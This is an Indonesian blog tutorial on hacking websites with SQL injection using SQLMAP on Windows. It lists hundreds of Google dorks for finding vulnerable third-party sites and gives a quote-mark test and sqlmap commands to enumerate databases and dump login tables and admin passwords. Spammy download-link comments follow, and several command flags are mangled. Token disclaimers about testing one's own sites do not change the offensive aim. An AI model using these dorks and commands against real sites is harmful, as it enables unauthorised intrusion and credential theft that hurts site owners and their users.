SQLMAP - Cara hack tabel SQL Website di Windows
Injeksi SQL memungkinkan kita menurunkan dari jauh semua tabel, nama pengguna login dan akun admin untuk sebuah situs web. Alat yang paling ampuh untuk injeksi SQL adalah SQLMAP, yang bisa kita gunakan pada Windows dan KALI.
Uji semua situs Anda dengan SQLMAP untuk memastikan bahwa mereka tidak rentan. Sangat penting bahwa Anda menguji semua situs web Anda menggunakan alat ini.
Langkah 1 - Download Python untuk Windows
https://www.python.org/downloads/release/python-2710/
Langkah 2 - Download SQLMAP untuk Windows
http://sqlmap.org/
Install to C:/SQLMAP
Langkah 3 - Temukan situs web yang rentan
Gunakan Google. Cari istilahnya
Dork google terbaru:
about.php?cartID=
accinfo.php?cartId=
acclogin.php?cartID=
add.php?bookid=
add_cart.php?num=
addcart.php?
addItem.php
add-to-cart.php?ID=
addToCart.php?idProduct=
addtomylist.php?ProdId=
adminEditProductFields.php?intProdID=
advSearch_h.php?idCategory=
affiliate.php?ID=
affiliate-agreement.cfm?storeid=
affiliates.php?id=
ancillary.php?ID=
archive.php?id=
article.php?id=
phpx?PageID
basket.php?id=
Book.php?bookID=
book_list.php?bookid=
book_view.php?bookid=
BookDetails.php?ID=
browse.php?catid=
browse_item_details.php
Browse_Item_Details.php?Store_Id=
buy.php?
buy.php?bookid=
bycategory.php?id=
cardinfo.php?card=
cart.php?action=
cart.php?cart_id=
cart.php?id=
cart_additem.php?id=
cart_validate.php?id=
cartadd.php?id=
cat.php?iCat=
catalog.php
catalog.php?CatalogID=
catalog_item.php?ID=
catalog_main.php?catid=
category.php
category.php?catid=
category_list.php?id=
categorydisplay.php?catid=
checkout.php?cartid=
checkout.php?UserID=
checkout_confirmed.php?order_id=
checkout1.php?cartid=
comersus_listCategoriesAndProducts.php?idCategory=
comersus_optEmailToFriendForm.php?idProduct=
comersus_optReviewReadExec.php?idProduct=
comersus_viewItem.php?idProduct=
comments_form.php?ID=
contact.php?cartId=
content.php?id=
customerService.php?****ID1=
default.php?catID=
description.php?bookid=
details.php?BookID=
details.php?Press_Release_ID=
details.php?Product_ID=
details.php?Service_ID=
display_item.php?id=
displayproducts.php
downloadTrial.php?intProdID=
emailproduct.php?itemid=
emailToFriend.php?idProduct=
events.php?ID=
faq.php?cartID=
faq_list.php?id=
faqs.php?id=
feedback.php?title=
freedownload.php?bookid=
fullDisplay.php?item=
getbook.php?bookid=
GetItems.php?itemid=
giftDetail.php?id=
help.php?CartId=
home.php?id=
index.php?cart=
index.php?cartID=
index.php?ID=
info.php?ID=
item.php?eid=
item.php?item_id=
item.php?itemid=
item.php?model=
item.php?prodtype=
item.php?shopcd=
item_details.php?catid=
item_list.php?maingroup
item_show.php?code_no=
itemDesc.php?CartId=
itemdetail.php?item=
itemdetails.php?catalogid=
learnmore.php?cartID=
links.php?catid=
list.php?bookid=
List.php?CatID=
listcategoriesandproducts.php?idCategory=
modline.php?id=
myaccount.php?catid=
news.php?id=
order.php?BookID=
order.php?id=
order.php?item_ID=
OrderForm.php?Cart=
page.php?PartID=
payment.php?CartID=
pdetail.php?item_id=
powersearch.php?CartId=
price.php
privacy.php?cartID=
prodbycat.php?intCatalogID=
prodetails.php?prodid=
prodlist.php?catid=
product.php?bookID=
product.php?intProdID=
product_info.php?item_id=
productDetails.php?idProduct=
productDisplay.php
productinfo.php?item=
productlist.php?ViewType=Category&CategoryID=
productpage.php
products.php?ID=
products.php?keyword=
products_category.php?CategoryID=
products_detail.php?CategoryID=
productsByCategory.php?intCatalogID=
prodView.php?idProduct=
promo.php?id=
promotion.php?catid=
pview.php?Item=
resellers.php?idCategory=
results.php?cat=
savecart.php?CartId=
search.php?CartID=
searchcat.php?search_id=
Select_Item.php?id=
Services.php?ID=
shippinginfo.php?CartId=
shop.php?a=
shop.php?action=
shop.php?bookid=
shop.php?cartID=
shop_details.php?prodid=
shopaddtocart.php
shopaddtocart.php?catalogid=
shopbasket.php?bookid=
shopbycategory.php?catid=
shopcart.php?title=
shopcreatorder.php
shopcurrency.php?cid=
shopdc.php?bookid=
shopdisplaycategories.php
shopdisplayproduct.php?catalogid=
shopdisplayproducts.php
shopexd.php
shopexd.php?catalogid=
shopping_basket.php?cartID=
shopprojectlogin.php
shopquery.php?catalogid=
shopremoveitem.php?cartid=
shopreviewadd.php?id=
shopreviewlist.php?id=
ShopSearch.php?CategoryID=
shoptellafriend.php?id=
shopthanks.php
shopwelcome.php?title=
show_item.php?id=
show_item_details.php?item_id=
showbook.php?bookid=
showStore.php?catID=
shprodde.php?SKU=
specials.php?id=
store.php?id=
store_bycat.php?id=
store_listing.php?id=
Store_ViewProducts.php?Cat=
store-details.php?id=
storefront.php?id=
storefronts.php?title=
storeitem.php?item=
StoreRedirect.php?ID=
subcategories.php?id=
tek9.php?
template.php?Action=Item&pid=
topic.php?ID=
tuangou.php?bookid=
type.php?iType=
updatebasket.php?bookid=
updates.php?ID=
view.php?cid=
view_cart.php?title=
view_detail.php?ID=
viewcart.php?CartId=
viewCart.php?userID=
viewCat_h.php?idCategory=
viewevent.php?EventID=
viewitem.php?recor=
viewPrd.php?idcategory=
ViewProduct.php?misc=
voteList.php?item_ID=
whatsnew.php?idCategory=
WsAncillary.php?ID=
WsPages.php?ID=noticiasDetalle.php?xid=
sitio/item.php?idcd=
index.php?site=
de/content.php?page_id=
gallerysort.php?iid=
products.php?type=
event.php?id=
showfeature.php?id=
home.php?ID=
tas/event.php?id=
profile.php?id=
details.php?id=
past-event.php?id=
index.php?action=
site/products.php?prodid=
page.php?pId=
resources/vulnerabilities_list.php?id=
site.php?id=
products/index.php?rangeid=
global_projects.php?cid=
publications/view.php?id=
display_page.php?id=
pages.php?ID=
lmsrecords_cd.php?cdid=
product.php?prd=
cat/?catid=
products/product-list.php?id=
debate-detail.php?id=
cbmer/congres/page.php?LAN=
content.php?id=
news.php?ID=
photogallery.php?id=
index.php?id=
product/product.php?product_no=
nyheder.htm?show=
book.php?ID=
print.php?id=
detail.php?id=
book.php?id=
content.php?PID=
more_detail.php?id=
content.php?id=
view_items.php?id=
view_author.php?id=
main.php?id=
english/fonction/print.php?id=
magazines/adult_magazine_single_page.php?magid=
product_details.php?prodid=
magazines/adult_magazine_full_year.php?magid=
products/card.php?prodID=
catalog/product.php?cat_id=
e_board/modifyform.html?code=
community/calendar-event-fr.php?id=
products.php?p=
news.php?id=
view/7/9628/1.html?reply=
product_details.php?prodid=
catalog/product.php?pid=
rating.php?id=
?page=
catalog/main.php?cat_id=
index.php?page=
detail.php?prodid=
products/product.php?pid=
news.php?id=
book_detail.php?BookID=
catalog/main.php?cat_id=
catalog/main.php?cat_id=
default.php?cPath=
catalog/main.php?cat_id=
catalog/main.php?cat_id=
category.php?catid=
categories.php?cat=
categories.php?cat=
detail.php?prodID=
detail.php?id=
category.php?id=
hm/inside.php?id=
index.php?area_id=
gallery.php?id=
products.php?cat=
products.php?cat=
media/pr.php?id=
books/book.php?proj_nr=
products/card.php?prodID=
general.php?id=
news.php?t=
usb/devices/showdev.php?id=
content/detail.php?id=
templet.php?acticle_id=
news/news/title_show.php?id=
product.php?id=
index.php?url=
cryolab/content.php?cid=
ls.php?id=
s.php?w=
abroad/page.php?cid=
bayer/dtnews.php?id=
news/temp.php?id=
index.php?url=
book/bookcover.php?bookid=
index.php/en/component/pvm/?view=
product/list.php?pid=
cats.php?cat=
software_categories.php?cat_id=
print.php?sid=
docDetail.aspx?chnum=
index.php?section=
index.php?page=
index.php?page=
en/publications.php?id=
events/detail.php?ID=
forum/profile.php?id=
media/pr.php?id=
content.php?ID=
cloudbank/detail.php?ID=
pages.php?id=
news.php?id=
beitrag_D.php?id=
content/index.php?id=
index.php?i=
?action=
index.php?page=
beitrag_F.php?id=
index.php?pageid=
page.php?modul=
detail.php?id=
index.php?w=
index.php?modus=
news.php?id=
news.php?id=
aktuelles/meldungen-detail.php?id=
item.php?id=
obio/detail.php?id=
page/de/produkte/produkte.php?prodID=
packages_display.php?ref=
shop/index.php?cPath=
modules.php?bookid=
product-range.php?rangeID=
en/news/fullnews.php?newsid=
deal_coupon.php?cat_id=
show.php?id=
blog/index.php?idBlog=
redaktion/whiteteeth/detail.php?nr=
HistoryStore/pages/item.php?itemID=
aktuelles/veranstaltungen/detail.php?id=
tecdaten/showdetail.php?prodid=
?id=
rating/stat.php?id=
content.php?id=
viewapp.php?id=
item.php?id=
news/newsitem.php?newsID=
FernandFaerie/index.php?c=
show.php?id=
?cat=
categories.php?cat=
category.php?c=
product_info.php?id=
prod.php?cat=
store/product.php?productid=
browsepr.php?pr=
product-list.php?cid=
products.php?cat_id=
product.php?ItemID=
category.php?c=
main.php?id=
article.php?id=
showproduct.php?productId=
view_item.php?item=
skunkworks/content.php?id=
index.php?id=
item_show.php?id=
publications.php?Id=
index.php?t=
view_items.php?id=
portafolio/portafolio.php?id=
YZboard/view.php?id=
index_en.php?ref=
index_en.php?ref=
category.php?id_category=
main.php?id=
main.php?id=
calendar/event.php?id=
default.php?cPath=
pages/print.php?id=
index.php?pg_t=
_news/news.php?id=
forum/showProfile.php?id=
fr/commande-liste-categorie.php?panier=
downloads/shambler.php?id=
sinformer/n/imprimer.php?id=
More_Details.php?id=
php? = id1
Browse ke situs web dan kemudian letakkan tanda hubung tunggal di akhir url.
jadi baca php? = id1 '
Jika mendapat error maka website tersebut rentan. Bagian dari perlindungan data UE dapat mencakup pengujian atau serangan terhadap database SQL.
Langkah 4 - Jalankan Wisaya SQLMAP di Windows
Buka prompt cmd.
tulis
cd c:\SQLMAP
dir
cari direktori sqlmap-project-sqlmap-xxxx kedua.
cd sqlmap-project-sqlmap-xxxx
Disini anda akan melihat sqlmap.py terdaftar ... ini adalah python script yang bisa dijalankan.
sqlmap.py –wizard
Pilih Website Target - termasuk id = 1
Pilih Kesulitan Injeksi (default)
Pilih Enumeration level
Pencacahan penuh database akan level 3- seperti yang ditunjukkan
Langkah 5 - KODE SERANGAN
SQLMAP akan melaporkan OS yang digunakan terlebih dahulu - terlepas dari kode serangan yang digunakan.
Bagaimana kita mengekstrak semua database?
http://www.website.com/page.php?id=1 –dbs
Cari berapa banyak database yang ada, dan berapa tabelnya !!
Bagaimana kita mengekstrak tabel?
http://www.website.com/page.php?id=1 –D www – tables
Bagaimana kita mendapatkan nama pengguna?
http://www.website.com/page.php?id=1 –D www -T uk_cms_gb_login -C username –dump
Carilah "admin"
Bagaimana cara mendapatkan semua rincian Login?
http://www.website.com/page.php?id=1 –D www -T uk_cms_gb_login –columns
Langkah 6 - Dapatkan Sandi (dari Admin)
http://www.website.com/page.php?id=1 –D www -T uk_cms_gb_login -C password –dump
SQLMAP harus digunakan terhadap semua situs Anda.
Hal terakhir yang Anda inginkan adalah seseorang mencuri seluruh database Anda.
Tutorial Hacking Sqlmap Injection (Windows) ~ Tutorial Dan Informasi Seputar Dunia Teknologi >>>>> Download Now
ReplyDelete>>>>> Download Full
Tutorial Hacking Sqlmap Injection (Windows) ~ Tutorial Dan Informasi Seputar Dunia Teknologi >>>>> Download LINK
>>>>> Download Now
Tutorial Hacking Sqlmap Injection (Windows) ~ Tutorial Dan Informasi Seputar Dunia Teknologi >>>>> Download Full
>>>>> Download LINK